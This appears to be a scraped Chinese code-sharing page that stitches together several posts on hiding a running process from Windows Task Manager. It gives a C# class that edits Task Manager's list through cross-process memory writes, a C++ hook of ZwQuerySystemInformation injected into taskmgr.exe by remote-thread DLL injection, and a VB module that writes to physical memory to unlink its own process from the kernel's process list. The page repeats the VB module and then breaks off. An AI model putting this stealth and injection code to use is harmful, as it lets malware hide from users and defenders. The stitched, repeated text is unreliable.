精华内容
下载资源
问答
  • 将API函数NtQuerySystemInformation()与我们自己的函数挂钩,该函数对任务管理器隐藏进程 挂钩函数被调用 DLL被注入Taskmgr.exe,因此有一个虚拟内存空间可用于执行我们的挂钩代码 免责声明 开发人员Josh ...
  • c# 隐藏进程代码,win10 win7 任务管理器隐藏进程
  • C#+任务管理器隐藏进程
  • 在XP2K 任务管理器进程列表中隐藏当前进程
  • ASP.Net4.0中新增23项功能 这里说的只是在WINDOWS 任务管理器隐藏,不是在进程里消失例如我们要隐藏QQ进程,不在WINDOWS任务管理器里显示 个人页面 登陆交谈
  • 难得的支持2000 2003 xp vista win7 隐藏进程的源代码,解决只能在win98下隐藏进程的难题。
  • VB关于任务管理器进程隐藏的问题,怎么样才能将执行的图标从任务管理器隐藏掉,同时防止程序关闭?
  • 超级任务管理器隐藏任务查看进程超详细的软件 适合网吧被管理的 任务查看器
  • C# 任务管理器隐藏进程

    千次阅读 2009-11-17 08:00:00
    这里说的只是在WINDOWS 任务管理器隐藏,不是在进程里消失例如我们要隐藏QQ进程,不在WINDOWS任务管理器里显示 使用方法 private WindowsAPI.HideTaskmgrList _List = new WindowsAPI.HideTaskmgrList();...

     这里说的只是在WINDOWS 任务管理器里隐藏,不是在进程里消失

    例如我们要隐藏QQ进程,不在WINDOWS任务管理器里显示

     使用方法

     private WindowsAPI.HideTaskmgrList _List = new WindowsAPI.HideTaskmgrList();
            private void Form1_Load(object sender, EventArgs e)
            {
                _List.ProcessName = "QQ.exe";
                _List.Star();

            }

    下面是全部的类

    view plaincopy to clipboardprint?
    namespace WindowsAPI  
    {  
        /// <summary>  
        /// 在WINDOWS任务管理器里 不显示进程  
        /// qq:116149  
        /// zgke@sina.copm  
        /// </summary>  
        public class HideTaskmgrList  
        {  
            private System.Timers.Timer m_Time = new System.Timers.Timer();  
            private string m_ProcessName = "";  
            private int m_ProcessID = 0;  
     
            /// <summary>  
            /// 进程名称  
            /// </summary>  
            public string ProcessName { get { return m_ProcessName; } set { m_ProcessName = value; } }  
     
            /// <summary>  
            /// 开始  
            /// </summary>  
            public void Star()  
            {  
                m_Time.Enabled = true;  
            }  
     
            /// <summary>  
            /// 停止  
            /// </summary>  
            public void Stop()  
            {  
                m_Time.Enabled = false;  
            }  
     
            public HideTaskmgrList()  
            {  
                m_Time.Interval = 1;  
                m_Time.Elapsed += new System.Timers.ElapsedEventHandler(_Time_Elapsed);  
            }  
     
            void _Time_Elapsed(object sender, System.Timers.ElapsedEventArgs e)  
            {  
                HideTaskmgrListOfName(m_ProcessName);  
            }  
     
            /// <summary>  
            /// 获取所有控件  
            /// </summary>  
            /// <param name="p_Handle"></param>  
            /// <param name="p_Param"></param>  
            /// <returns></returns>  
            private bool NetEnumControl(IntPtr p_Handle, int p_Param)  
            {  
                WindowsAPI.Win32API.STRINGBUFFER _TextString = new WindowsAPI.Win32API.STRINGBUFFER();  
                WindowsAPI.Win32API.GetWindowText(p_Handle, out _TextString, 256);  
     
                WindowsAPI.Win32API.STRINGBUFFER _ClassName = new WindowsAPI.Win32API.STRINGBUFFER();  
                WindowsAPI.Win32API.GetClassName(p_Handle, out _ClassName, 255);  
     
                if (_TextString.szText == "进程" && _ClassName.szText == "SysListView32")  
                {  
                    Hide(p_Handle);  
                    return false;  
                }  
     
                return true;  
            }  
     
            /// <summary>  
            /// 隐藏  
            /// </summary>  
            /// <param name="p_ListViewIntPtr"></param>  
            public void Hide(IntPtr p_ListViewIntPtr)  
            {  
                IntPtr _ControlIntPtr = p_ListViewIntPtr;  
     
                int _ItemCount = WindowsAPI.Win32API.SendMessage(p_ListViewIntPtr, 0x1004, 0, 0);  
     
                WindowsAPI.Win32API.ProcessAccessType _Type;  
                _Type = WindowsAPI.Win32API.ProcessAccessType.PROCESS_VM_OPERATION | WindowsAPI.Win32API.ProcessAccessType.PROCESS_VM_READ | WindowsAPI.Win32API.ProcessAccessType.PROCESS_VM_WRITE;  
     
                IntPtr _ProcessIntPtr = WindowsAPI.Win32API.OpenProcess(_Type, 1, (uint)m_ProcessID);  
     
                IntPtr _Out = IntPtr.Zero;  
                for (int z = 0; z != _ItemCount; z++)  
                {  
     
                    //分配一个内存地址 保存进程的应用程序名称  
                    IntPtr _StrBufferMemory = WindowsAPI.Win32API.VirtualAllocEx(_ProcessIntPtr, 0, 255, WindowsAPI.Win32API.MEM_COMMIT.MEM_COMMIT, WindowsAPI.Win32API.MEM_PAGE.PAGE_READWRITE);  
     
                    byte[] _OutBytes = new byte[40];  //定义结构体 (LVITEM)          
     
                    byte[] _StrIntPtrAddress = BitConverter.GetBytes(_StrBufferMemory.ToInt32());  
                    _OutBytes[20] = _StrIntPtrAddress[0];  
                    _OutBytes[21] = _StrIntPtrAddress[1];  
                    _OutBytes[22] = _StrIntPtrAddress[2];  
                    _OutBytes[23] = _StrIntPtrAddress[3];  
                    _OutBytes[24] = 255;  
     
                    //给结构体分配内存  
                    IntPtr _Memory = WindowsAPI.Win32API.VirtualAllocEx(_ProcessIntPtr, 0, _OutBytes.Length, WindowsAPI.Win32API.MEM_COMMIT.MEM_COMMIT, WindowsAPI.Win32API.MEM_PAGE.PAGE_READWRITE);  
                    //把数据传递给结构体 (LVITEM)    
                    WindowsAPI.Win32API.WriteProcessMemory(_ProcessIntPtr, _Memory, _OutBytes, (uint)_OutBytes.Length, out _Out);  
     
                    //发送消息获取结构体数据  
                    WindowsAPI.Win32API.SendMessage(p_ListViewIntPtr, 0x102D, z, _Memory);  
     
                    //获取结构体数据  
                    WindowsAPI.Win32API.ReadProcessMemory(_ProcessIntPtr, _Memory, _OutBytes, (uint)_OutBytes.Length, out _Out);  
     
                    //获取结构体 pszText的地址  
                    IntPtr _ValueIntPtr = new IntPtr(BitConverter.ToInt32(_OutBytes, 20));  
     
                    byte[] _TextBytes = new byte[255];  //获取pszText的数据  
                    WindowsAPI.Win32API.ReadProcessMemory(_ProcessIntPtr, _ValueIntPtr, _TextBytes, 255, out _Out);  
                    //获取进程名称   
                    string _ProcessText = System.Text.Encoding.Default.GetString(_TextBytes).Trim(new Char[] { '/0' });  
                    //释放内存  
                    WindowsAPI.Win32API.VirtualFreeEx(_ProcessIntPtr, _StrBufferMemory, 0, WindowsAPI.Win32API.MEM_COMMIT.MEM_RELEASE);  
                    WindowsAPI.Win32API.VirtualFreeEx(_ProcessIntPtr, _Memory, 0, WindowsAPI.Win32API.MEM_COMMIT.MEM_RELEASE);  
     
                    if (_ProcessText == m_ProcessName)  
                    {  
                        WindowsAPI.Win32API.SendMessage(p_ListViewIntPtr, 0x1008, z, 0);  
                    }  
                }  
            }  
     
            /// <summary>  
            /// 在WINDOWS任务管理器里隐藏一行 需要一直调用 会被任务管理器刷新出来  
            /// </summary>  
            /// <param name="p_Name">名称 如QQ.exe</param>  
            public void HideTaskmgrListOfName(string p_Name)  
            {  
                System.Diagnostics.Process[] _ProcessList = System.Diagnostics.Process.GetProcessesByName("taskmgr");  
                for (int i = 0; i != _ProcessList.Length; i++)  
                {  
                    if (_ProcessList[i].MainWindowTitle == "Windows 任务管理器")  
                    {  
                        m_ProcessID = _ProcessList[i].Id;  
                        WindowsAPI.Win32API.EnumWindowsProc _EunmControl = new WindowsAPI.Win32API.EnumWindowsProc(NetEnumControl);  
     
                        WindowsAPI.Win32API.EnumChildWindows(_ProcessList[i].MainWindowHandle, _EunmControl, 0);  
                    }  
                }  
            }  
        }  
     
     
        public class Win32API  
        {  
            
            public enum MEM_PAGE  
            {  
                PAGE_NOACCESS = 0x1,  
                PAGE_READONLY = 0x2,  
                PAGE_READWRITE = 0x4,  
                PAGE_WRITECOPY = 0x8,  
                PAGE_EXECUTE = 0x10,  
                PAGE_EXECUTE_READ = 0x20,  
                PAGE_EXECUTE_READWRITE = 0x40,  
                PAGE_EXECUTE_READWRITECOPY = 0x50,  
                PAGE_EXECUTE_WRITECOPY = 0x80,  
                PAGE_GUARD = 0x100,  
                PAGE_NOCACHE = 0x200,  
                PAGE_WRITECOMBINE = 0x400,  
            }  
     
     
           
            public enum MEM_COMMIT  
            {  
                MEM_COMMIT = 0x1000,  
                MEM_RESERVE = 0x2000,  
                MEM_DECOMMIT = 0x4000,  
                MEM_RELEASE = 0x8000,  
                MEM_FREE = 0x10000,  
                MEM_PRIVATE = 0x20000,  
                MEM_MAPPED = 0x40000,  
                MEM_RESET = 0x80000,  
                MEM_TOP_DOWN = 0x100000,  
                MEM_WRITE_WATCH = 0x200000,  
                MEM_PHYSICAL = 0x400000,  
                MEM_IMAGE = 0x1000000  
            }  
             
            [Flags]  
            public enum ProcessAccessType  
            {  
                PROCESS_TERMINATE = (0x0001),  
                PROCESS_CREATE_THREAD = (0x0002),  
                PROCESS_SET_SESSIONID = (0x0004),  
                PROCESS_VM_OPERATION = (0x0008),  
                PROCESS_VM_READ = (0x0010),  
                PROCESS_VM_WRITE = (0x0020),  
                PROCESS_DUP_HANDLE = (0x0040),  
                PROCESS_CREATE_PROCESS = (0x0080),  
                PROCESS_SET_QUOTA = (0x0100),  
                PROCESS_SET_INFORMATION = (0x0200),  
                PROCESS_QUERY_INFORMATION = (0x0400)  
            }  
     
            [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Auto)]  
            public struct STRINGBUFFER  
            {  
                [MarshalAs(UnmanagedType.ByValTStr, SizeConst = 512)]  
                public string szText;  
            }  
            public delegate bool EnumWindowsProc(IntPtr p_Handle, int p_Param);  
     
           
            [DllImport("kernel32.dll")]  
            public static extern IntPtr OpenProcess(ProcessAccessType dwDesiredAccess, int bInheritHandle, uint dwProcessId);  
             
            [DllImport("kernel32.dll")]  
            public static extern Int32 CloseHandle(IntPtr hObject);  
              
            [DllImport("kernel32.dll")]  
            public static extern Int32 ReadProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, [In, Out] byte[] buffer, UInt32 size, out IntPtr lpNumberOfBytesRead);  
             
            [DllImport("kernel32.dll")]  
            public static extern Int32 WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, [In, Out] byte[] buffer, UInt32 size, out IntPtr lpNumberOfBytesWritten);  
            
            [DllImport("kernel32.dll")]  
            public static extern IntPtr VirtualAllocEx(IntPtr hProcess, int lpAddress, int dwSize, MEM_COMMIT flAllocationType, MEM_PAGE flProtect);  
             
            [DllImport("kernel32.dll")]  
            public static extern IntPtr VirtualFreeEx(IntPtr hProcess, IntPtr lpAddress, int dwSize, MEM_COMMIT dwFreeType);  
     
            [DllImport("User32.dll", CharSet = CharSet.Auto)]  
            public static extern int GetWindowText(IntPtr hWnd, out STRINGBUFFER text, int nMaxCount);  
     
            [DllImport("User32.dll", CharSet = CharSet.Auto)]  
            public static extern int GetClassName(IntPtr hWnd, out STRINGBUFFER ClassName, int nMaxCount);  
     
            [DllImport("user32.dll", CharSet = CharSet.Auto)]  
            public static extern int SendMessage(IntPtr hWnd, int Msg, int wParam, int lParam);  
     
            [DllImport("user32.dll", CharSet = CharSet.Auto)]  
            public static extern int SendMessage(IntPtr hWnd, int Msg, int wParam, IntPtr lParam);  
     
            [DllImport("user32.dll")]  
            public static extern int EnumChildWindows(IntPtr hWndParent, EnumWindowsProc ewp, int lParam);  
     
        }  
     
     
         

     

    展开全文
  • VB将自身进程任务管理器隐藏一例,当然还可以将进程显示,没有复杂的界面,如上图中,有两个按钮,大家下载源码自己测试吧。
  • 在XP2K 任务管理器进程列表中隐藏当前进程-精品源代码
  • '模块名称:modHideProcess.bas '模块功能:在 XP/2K 任务管理器进程列表中隐藏当前进程 '使用方法:直接调用 HideCurrentProcess()
  • 本程序用VB编写,可在任务管理器进程隐藏.
  • 隐藏进程 使进程不在任务管理器中出现,是一个很好的编程技巧,代码详细
  • vb中如何在任务管理器里面隐藏应用程序进程[vb中如何在任务管理器里面隐藏应用程序进程]-精品源代码
  • vb 可显示隐藏进程任务管理器,包括源代码。 有用的朋友可以下。
  • InlineHook任务管理器_ZwQuerySystemInformation_隐藏进程 hook步骤: 查找目标函数地址 修改目标函数第一条指令跳转到我们构造的函数 卸载掉钩子,执行正常的目标函数 过滤掉特定信息后返回 hook代码...

    InlineHook任务管理器_ZwQuerySystemInformation_隐藏进程


    hook步骤:

    • 查找目标函数地址

    • 修改目标函数第一条指令跳转到我们构造的函数

    • 卸载掉钩子,执行正常的目标函数

    • 过滤掉特定信息后返回

    hook代码如下

    #include<windows.h>
    #include<Winternl.h>
    
    BOOL hook_code();
    BOOL unHook_code();
    NTSTATUS WINAPI NewZwQuerySystemInformation(SYSTEM_INFORMATION_CLASS SystemInformationClass,PVOID SystemInformation,ULONG SystemInformationLength,PULONG ReturnLength);
    char StroneDate[5]={0x00,0x00,0x00,0x00,0x00,};//备份原始字节
    DWORD OldProtect;//原始页保护属性
    DWORD dwAddress;//跳转偏移地址
    FARPROC procaddr;
    DWORD num;
    byte pBuf[5]={0xE9,0xFF,0xFF,0xFF,0xFF};
    typedef NTSTATUS (WINAPI * ZwQuerySystemInformation) (SYSTEM_INFORMATION_CLASS SystemInformationClass,PVOID SystemInformation,ULONG SystemInformationLength,PULONG ReturnLength);
    
    BOOL WINAPI DllMain(HMODULE hModule,DWORD call,LPVOID lpreserved)
    {
    	hook_code();
    	return true;
    }
    BOOL hook_code()
    {
    	
    	
    	procaddr = (FARPROC)GetProcAddress(GetModuleHandleA("ntdll.dll"),"ZwQuerySystemInformation");//获取函数地址
    	VirtualProtect(procaddr,5,PAGE_EXECUTE_READWRITE,&OldProtect);//修改页保护属性
    	if(!StroneDate[0])
    	{
    			memcpy(StroneDate,procaddr,5);
    	}//备份原始指令
    	dwAddress = (DWORD)NewZwQuerySystemInformation -(DWORD) procaddr -5;//计算函数偏移 
    	memcpy(&(pBuf[1]),&dwAddress,4);//精准偏移
    	memcpy(procaddr,pBuf,5);
    	VirtualProtect(procaddr,5,OldProtect,&OldProtect);
    	return TRUE;
    }
    
    BOOL unHook_code()
    {
    	VirtualProtect(procaddr,5,PAGE_EXECUTE_READWRITE,&OldProtect);
    	memcpy(procaddr,StroneDate,5);
    	VirtualProtect(procaddr,5,OldProtect,&OldProtect);
    	return TRUE;
    }
    NTSTATUS WINAPI NewZwQuerySystemInformation(SYSTEM_INFORMATION_CLASS SystemInformationClass,PVOID SystemInformation,ULONG SystemInformationLength,PULONG ReturnLength)
    {
    	unHook_code();
    	NTSTATUS status = ((ZwQuerySystemInformation)procaddr)(SystemInformationClass, SystemInformation, SystemInformationLength, ReturnLength);
    	PSYSTEM_PROCESS_INFORMATION pcurr = (PSYSTEM_PROCESS_INFORMATION)SystemInformation;
    	PSYSTEM_PROCESS_INFORMATION plast =NULL;//last node
    	if(SystemInformationClass == 5)
    	{
    		while(TRUE)
    		{
    			if((PWSTR)pcurr->Reserved2[1] != NULL)//ImageName
    			{
    				if(0 == memcmp(pcurr->Reserved2[1],L"calc.exe",4))
    				{
    					if(pcurr->NextEntryOffset == 0)
    						plast->NextEntryOffset = 0;
    					else
    						plast->NextEntryOffset += pcurr->NextEntryOffset;
    				}
    				else
    					plast = pcurr;
    			}
    
    			if(pcurr->NextEntryOffset == 0)
    				break;
    			pcurr = (PSYSTEM_PROCESS_INFORMATION)((ULONG)pcurr + pcurr->NextEntryOffset);
    		}
    	}
    	hook_code();
    	return status;
    	
    }
    

    使用远线程注入,将hookdll注入到任务管理器

    #include<stdio.h>
    #include<windows.h>
    #include<Tlhelp32.h>
    #define PATH "C:\\Users\\john\\Desktop\\hookdll.dll"//要注入的dll绝对路径
    BOOL EnumProcess();
    BOOL Inject(DWORD);
    DWORD dwPID;
    void main()
    {
    	
    	if(EnumProcess())
    	{
    		Inject(dwPID);
    	}
    
    }
    
    BOOL EnumProcess()
    {
    	PROCESSENTRY32 pe32 = {0};
    	pe32.dwSize = sizeof(PROCESSENTRY32);
    	HANDLE hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);//拍进程快照
    	if (INVALID_HANDLE_VALUE == hProcessSnap)
    	{
    		printf("CreateToolhelp32Snapshot Error :%d",GetLastError());
    	}
    	BOOL Ret = Process32First(hProcessSnap,&pe32);//枚举快照
    	while(Ret)
    	{
    		int i = strcmp("taskmgr.exe",pe32.szExeFile);
    		if(!i)
    		{	
    			dwPID = pe32.th32ProcessID;
    			return TRUE;
    		}
    		Ret = Process32Next(hProcessSnap,&pe32);//下一进程信息
    	}
    	return FALSE;
    }
    BOOL Inject(DWORD dwPID)
    {
    	HANDLE hand = OpenProcess(PROCESS_ALL_ACCESS,NULL,dwPID);
    	LPVOID lpaddress = VirtualAllocEx(hand,NULL,0x1000,MEM_COMMIT,PAGE_EXECUTE_READWRITE);//申请指定大小内存,分配读写执行权限
    	bool write = WriteProcessMemory(hand,lpaddress,PATH,0x1000,NULL);//实现注入
    	CreateRemoteThread(hand,NULL,NULL,(LPTHREAD_START_ROUTINE)LoadLibrary,lpaddress,NULL,NULL);//创建线程执行dll
    	return TRUE;
    }
    
    

    效果图如下:

    展开全文
  • 优点:不用加载驱动,简单实用,不需要什么高技术。缺点:①限制winxp和win7(为什么...)②只能隐藏任务管理器进程列表的(只能防电脑小白)③如果进程列表没有“PID”列,会隐藏全部同名进程说明:仅仅适合winXP和win7系统
  • 参考: http://topic.csdn.net/t/20040915/18/3376105.html http://topic.csdn.net/t/20040915/18/3376105.html 转载于:https://www.cnblogs.com/pipicfan/archive/2012/01/01/2309287.html

    参考:

    http://topic.csdn.net/t/20040915/18/3376105.html

    http://topic.csdn.net/t/20040915/18/3376105.html

    转载于:https://www.cnblogs.com/pipicfan/archive/2012/01/01/2309287.html

    展开全文
  • Option Explicit'-----------------------------------------------------'模块名称:modHideProcess.bas''模块功能:在 XP/2K 任务管理器进程列表中隐藏当前进程''使用方法:直接调用 HideCurrentProcess()...
    新建一个模块,把以下代码复制进去,然后在load中调用即可实现隐藏当前进程的目的。
    Option Explicit
    '-----------------------------------------------------
    '模块名称:modHideProcess.bas
    '
    '模块功能:在 XP/2K 任务管理器的进程列表中隐藏当前进程
    '
    '使用方法:直接调用 HideCurrentProcess()
    '
    '
    '
    '-----------------------------------------------------
    Private Const STATUS_INFO_LENGTH_MISMATCH = &HC0000004
    Private Const STATUS_ACCESS_DENIED = &HC0000022
    Private Const STATUS_INVALID_HANDLE = &HC0000008
    Private Const ERROR_SUCCESS = 0&
    Private Const SECTION_MAP_WRITE = &H2
    Private Const SECTION_MAP_READ = &H4
    Private Const READ_CONTROL = &H20000
    Private Const WRITE_DAC = &H40000
    Private Const NO_INHERITANCE = 0
    Private Const DACL_SECURITY_INFORMATION = &H4
    Private Type IO_STATUS_BLOCK
    Status As Long
    Information As Long
    End Type
    Private Type UNICODE_STRING
    Length As Integer
    MaximumLength As Integer
    Buffer As Long
    End Type
    Private Const OBJ_INHERIT = &H2
    Private Const OBJ_PERMANENT = &H10
    Private Const OBJ_EXCLUSIVE = &H20
    Private Const OBJ_CASE_INSENSITIVE = &H40
    Private Const OBJ_OPENIF = &H80
    Private Const OBJ_OPENLINK = &H100
    Private Const OBJ_KERNEL_HANDLE = &H200
    Private Const OBJ_VALID_ATTRIBUTES = &H3F2
    Private Type OBJECT_ATTRIBUTES
    Length As Long
    RootDirectory As Long
    ObjectName As Long
    Attributes As Long
    SecurityDeor As Long
    SecurityQualityOfService As Long
    End Type
    Private Type ACL
    AclRevision As Byte
    Sbz1 As Byte
    AclSize As Integer
    AceCount As Integer
    Sbz2 As Integer
    End Type
    Private Enum ACCESS_MODE
    NOT_USED_ACCESS
    GRANT_ACCESS
    SET_ACCESS
    DENY_ACCESS
    REVOKE_ACCESS
    SET_AUDIT_SUCCESS
    SET_AUDIT_FAILURE
    End Enum
    Private Enum MULTIPLE_TRUSTEE_OPERATION
    NO_MULTIPLE_TRUSTEE
    TRUSTEE_IS_IMPERSONATE
    End Enum
    Private Enum TRUSTEE_FORM
    TRUSTEE_IS_SID
    TRUSTEE_IS_NAME
    End Enum
    Private Enum TRUSTEE_TYPE
    TRUSTEE_IS_UNKNOWN
    TRUSTEE_IS_USER
    TRUSTEE_IS_GROUP
    End Enum
    Private Type TRUSTEE
    pMultipleTrustee As Long
    MultipleTrusteeOperation As MULTIPLE_TRUSTEE_OPERATION
    TrusteeForm As TRUSTEE_FORM
    TrusteeType As TRUSTEE_TYPE
    ptstrName As String
    End Type
    Private Type EXPLICIT_ACCESS
    grfAccessPermissions As Long
    grfAccessMode As ACCESS_MODE
    grfInheritance As Long
    TRUSTEE As TRUSTEE
    End Type
    Private Type AceArray
    List() As EXPLICIT_ACCESS
    End Type
    Private Enum SE_OBJECT_TYPE
    SE_UNKNOWN_OBJECT_TYPE = 0
    SE_FILE_OBJECT
    SE_SERVICE
    SE_PRINTER
    SE_REGISTRY_KEY
    SE_LMSHARE
    SE_KERNEL_OBJECT
    SE_WINDOW_OBJECT
    SE_DS_OBJECT
    SE_DS_OBJECT_ALL
    SE_PROVIDER_DEFINED_OBJECT
    SE_WMIGUID_OBJECT
    End Enum
    Private Declare Function SetSecurityInfo Lib "advapi32.dll" (ByVal Handle As Long, ByVal ObjectType As SE_OBJECT_TYPE, ByVal SecurityInfo As Long, ppsidOwner As Long, ppsidGroup As Long, ppDacl As Any, ppSacl As Any) As Long
    Private Declare Function GetSecurityInfo Lib "advapi32.dll" (ByVal Handle As Long, ByVal ObjectType As SE_OBJECT_TYPE, ByVal SecurityInfo As Long, ppsidOwner As Long, ppsidGroup As Long, ppDacl As Any, ppSacl As Any, ppSecurityDeor As Long) As Long

    Private Declare Function SetEntriesInAcl Lib "advapi32.dll" Alias "SetEntriesInAclA" (ByVal cCountOfExplicitEntries As Long, pListOfExplicitEntries As EXPLICIT_ACCESS, ByVal OldAcl As Long, NewAcl As Long) As Long
    Private Declare Sub BuildExplicitAccessWithName Lib "advapi32.dll" Alias "BuildExplicitAccessWithNameA" (pExplicitAccess As EXPLICIT_ACCESS, ByVal pTrusteeName As String, ByVal AccessPermissions As Long, ByVal AccessMode As ACCESS_MODE, ByVal Inheritance As Long)

    Private Declare Sub RtlInitUnicodeString Lib "NTDLL.DLL" (DestinationString As UNICODE_STRING, ByVal SourceString As Long)
    Private Declare Function ZwOpenSection Lib "NTDLL.DLL" (SectionHandle As Long, ByVal DesiredAccess As Long, ObjectAttributes As Any) As Long
    Private Declare Function LocalFree Lib "kernel32" (ByVal hMem As Any) As Long
    Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
    Private Declare Function MapViewOfFile Lib "kernel32" (ByVal hFileMappingObject As Long, ByVal dwDesiredAccess As Long, ByVal dwFileOffsetHigh As Long, ByVal dwFileOffsetLow As Long, ByVal dwNumberOfBytesToMap As Long) As Long
    Private Declare Function UnmapViewOfFile Lib "kernel32" (lpBaseAddress As Any) As Long
    Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As Long)
    Private Declare Function GetVersionEx Lib "kernel32" Alias "GetVersionExA" (LpVersionInformation As OSVERSIONINFO) As Long
    Private Type OSVERSIONINFO
    dwOSVersionInfoSize As Long
    dwMajorVersion As Long
    dwMinorVersion As Long
    dwBuildNumber As Long
    dwPlatformId As Long
    szCSDVersion As String * 128
    End Type

    Private verinfo As OSVERSIONINFO

    Private g_hNtDLL As Long
    Private g_pMapPhysicalMemory As Long
    Private g_hMPM As Long
    Private aByte(3) As Byte
    Public Sub HideCurrentProcess()
    '在进程列表中隐藏当前应用程序进程
    Dim thread As Long, process As Long, fw As Long, bw As Long
    Dim lOffsetFlink As Long, lOffsetBlink As Long, lOffsetPID As Long

    verinfo.dwOSVersionInfoSize = Len(verinfo)
    If (GetVersionEx(verinfo)) <> 0 Then
    If verinfo.dwPlatformId = 2 Then
    If verinfo.dwMajorVersion = 5 Then
    Select Case verinfo.dwMinorVersion
    Case 0
    lOffsetFlink = &HA0
    lOffsetBlink = &HA4
    lOffsetPID = &H9C
    Case 1
    lOffsetFlink = &H88
    lOffsetBlink = &H8C
    lOffsetPID = &H84
    End Select
    End If
    End If
    End If
    If OpenPhysicalMemory <> 0 Then
    thread = GetData(&HFFDFF124)
    process = GetData(thread + &H44)
    fw = GetData(process + lOffsetFlink)
    bw = GetData(process + lOffsetBlink)
    SetData fw + 4, bw
    SetData bw, fw
    CloseHandle g_hMPM
    End If
    End Sub
    Private Sub SetPhyscialMemorySectionCanBeWrited(ByVal hSection As Long)
    Dim pDacl As Long
    Dim pNewDacl As Long
    Dim pSD As Long
    Dim dwRes As Long
    Dim ea As EXPLICIT_ACCESS

    GetSecurityInfo hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, 0, 0, pDacl, 0, pSD

    ea.grfAccessPermissions = SECTION_MAP_WRITE
    ea.grfAccessMode = GRANT_ACCESS
    ea.grfInheritance = NO_INHERITANCE
    ea.TRUSTEE.TrusteeForm = TRUSTEE_IS_NAME
    ea.TRUSTEE.TrusteeType = TRUSTEE_IS_USER
    ea.TRUSTEE.ptstrName = "CURRENT_USER" & vbNullChar
    SetEntriesInAcl 1, ea, pDacl, pNewDacl

    SetSecurityInfo hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, 0, 0, ByVal pNewDacl, 0

    CleanUp:
    LocalFree pSD
    LocalFree pNewDacl
    End Sub
    Private Function OpenPhysicalMemory() As Long
    Dim Status As Long
    Dim PhysmemString As UNICODE_STRING
    Dim Attributes As OBJECT_ATTRIBUTES

    RtlInitUnicodeString PhysmemString, StrPtr("\Device\PhysicalMemory")
    Attributes.Length = Len(Attributes)
    Attributes.RootDirectory = 0
    Attributes.ObjectName = VarPtr(PhysmemString)
    Attributes.Attributes = 0
    Attributes.SecurityDeor = 0
    Attributes.SecurityQualityOfService = 0

    Status = ZwOpenSection(g_hMPM, SECTION_MAP_READ or SECTION_MAP_WRITE, Attributes)
    If Status = STATUS_ACCESS_DENIED Then
    Status = ZwOpenSection(g_hMPM, READ_CONTROL or WRITE_DAC, Attributes)
    SetPhyscialMemorySectionCanBeWrited g_hMPM
    CloseHandle g_hMPM
    Status = ZwOpenSection(g_hMPM, SECTION_MAP_READ or SECTION_MAP_WRITE, Attributes)
    End If

    Dim lDirectoty As Long
    verinfo.dwOSVersionInfoSize = Len(verinfo)
    If (GetVersionEx(verinfo)) <> 0 Then
    If verinfo.dwPlatformId = 2 Then
    If verinfo.dwMajorVersion = 5 Then
    Select Case verinfo.dwMinorVersion
    Case 0
    lDirectoty = &H30000
    Case 1
    lDirectoty = &H39000
    End Select
    End If
    End If
    End If

    If Status = 0 Then
    g_pMapPhysicalMemory = MapViewOfFile(g_hMPM, 4, 0, lDirectoty, &H1000)
    If g_pMapPhysicalMemory <> 0 Then OpenPhysicalMemory = g_hMPM
    End If
    End Function
    Private Function LinearToPhys(BaseAddress As Long, addr As Long) As Long
    Dim VAddr As Long, PGDE As Long, PTE As Long, PAddr As Long
    Dim lTemp As Long

    VAddr = addr
    CopyMemory aByte(0), VAddr, 4
    lTemp = Fix(ByteArrToLong(aByte) / (2 ^ 22))

    PGDE = BaseAddress + lTemp * 4
    CopyMemory PGDE, ByVal PGDE, 4

    If (PGDE And 1) <> 0 Then
    lTemp = PGDE And &H80
    If lTemp <> 0 Then
    PAddr = (PGDE And &HFFC00000) + (VAddr And &H3FFFFF)
    Else
    PGDE = MapViewOfFile(g_hMPM, 4, 0, PGDE And &HFFFFF000, &H1000)
    lTemp = (VAddr And &H3FF000) / (2 ^ 12)
    PTE = PGDE + lTemp * 4
    CopyMemory PTE, ByVal PTE, 4

    If (PTE And 1) <> 0 Then
    PAddr = (PTE And &HFFFFF000) + (VAddr And &HFFF)
    UnmapViewOfFile PGDE
    End If
    End If
    End If

    LinearToPhys = PAddr
    End Function
    Private Function GetData(addr As Long) As Long
    Dim phys As Long, tmp As Long, ret As Long

    phys = LinearToPhys(g_pMapPhysicalMemory, addr)
    tmp = MapViewOfFile(g_hMPM, 4, 0, phys And &HFFFFF000, &H1000)
    If tmp <> 0 Then
    ret = tmp + ((phys And &HFFF) / (2 ^ 2)) * 4
    CopyMemory ret, ByVal ret, 4

    UnmapViewOfFile tmp
    GetData = ret
    End If
    End Function
    Private Function SetData(ByVal addr As Long, ByVal data As Long) As Boolean
    Dim phys As Long, tmp As Long, x As Long

    phys = LinearToPhys(g_pMapPhysicalMemory, addr)
    tmp = MapViewOfFile(g_hMPM, SECTION_MAP_WRITE, 0, phys And &HFFFFF000, &H1000)
    If tmp <> 0 Then
    x = tmp + ((phys And &HFFF) / (2 ^ 2)) * 4
    CopyMemory ByVal x, data, 4

    UnmapViewOfFile tmp
    SetData = True
    End If
    End Function
    Private Function ByteArrToLong(inByte() As Byte) As Double
    Dim I As Integer
    For I = 0 To 3
    ByteArrToLong = ByteArrToLong + inByte(I) * (&H100 ^ I)
    Next I
    End Function

    新建一个模块,把以下代码复制进去,然后在load中调用即可实现隐藏当前进程的目的。

    Option Explicit
    [color=#ff00ff]'-----------------------------------------------------

    '模块名称:modHideProcess.bas
    '
    '模块功能:在 XP/2K 任务管理器的进程列表中隐藏当前进程
    '
    '使用方法:直接调用 HideCurrentProcess()
    '
    '
    '
    '-----------------------------------------------------
    Private Const STATUS_INFO_LENGTH_MISMATCH = &HC0000004
    Private Const STATUS_ACCESS_DENIED = &HC0000022
    Private Const STATUS_INVALID_HANDLE = &HC0000008
    Private Const ERROR_SUCCESS = 0&
    Private Const SECTION_MAP_WRITE = &H2
    Private Const SECTION_MAP_READ = &H4
    Private Const READ_CONTROL = &H20000
    Private Const WRITE_DAC = &H40000
    Private Const NO_INHERITANCE = 0
    Private Const DACL_SECURITY_INFORMATION = &H4
    Private Type IO_STATUS_BLOCK
    Status As Long
    Information As Long
    End Type
    Private Type UNICODE_STRING
    Length As Integer
    MaximumLength As Integer
    Buffer As Long
    End Type
